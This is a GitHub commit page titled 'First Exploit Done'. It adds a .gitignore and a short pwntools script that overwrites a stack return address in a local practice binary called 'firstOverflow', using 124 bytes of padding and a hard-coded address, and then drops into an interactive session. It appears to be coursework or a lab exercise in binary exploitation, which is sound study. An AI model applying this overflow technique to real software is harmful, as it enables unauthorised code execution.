Skip to content
Permalink
Browse files
First Exploit Done
  • Loading branch information
aa9863 committed Nov 18, 2020
1 parent cd393ae commit f0ab646faee5112c049ab2e46cc04022116e8540
Show file tree
Hide file tree
Showing 2 changed files with 12 additions and 0 deletions.
@@ -0,0 +1,3 @@
*~
peda*
.gdb_history
@@ -0,0 +1,9 @@
from pwn import *


payload = "A"*124 #Offset
payload += p32(0x565561dd) #Address
print(payload)
## Create a connection to the binary
p = process(["firstOverflow", payload])#payload], shell=True)
p.interactive()

0 comments on commit f0ab646

Please sign in to comment.